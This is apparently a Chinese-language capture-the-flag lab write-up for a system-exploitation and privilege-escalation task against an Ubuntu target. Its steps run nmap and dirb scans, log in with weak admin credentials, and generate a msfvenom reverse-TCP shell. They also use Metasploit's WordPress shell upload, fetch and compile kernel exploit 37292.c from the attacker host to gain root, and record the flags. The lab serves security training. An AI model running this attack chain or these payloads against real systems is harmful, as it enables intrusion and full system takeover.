B-1:系统利用与提权
任务环境说明:
服务器场景:PYsystem001
服务器场景操作系统:Ubuntu(显示链接)
服务器用户名:未知 密码:未知
- 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;
nmap -sV ip 扫描
- 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;
通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。
优先扫描特殊端口:dirb http://172.16.105.245:8080/
扫描出后台地址,通过题目提示弱口令登录
falg[admin,123456]
4. 利用Kali深入机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;
这里固定的falg:[Payload]
命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe
5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;
我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload
set rhost 172.16.105.245
set username admin
set password 123456
set targeturi /wordpress
shell连接后whoami查看权限
falg[daemon]
7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;
命令:uname -a查看系统内核版本号
falg[3.13.0]
8. 在Kali攻击机中查找可使用的源码,将找到的源码文件名作为FLAG(形式:[文件名])提交;
利用kali中的searchsploit命令查看可使用的源码
命令searchsploit 3.13.0
falg[37292.c]
9. 利用上述源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;
把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/
启动kali的apche服务
使用python切换至交互式shell
命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’
使用命令wget把刚刚上传中37292.c文件下载下来
编译37292.c生成shell文件
运行shell文件,获得root权限
进入root目录查看txt文件名为adftutij.txt
flag[adftutij.txt]
11. 利用源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。
cat查看文件内容
flag[hyjufk983]
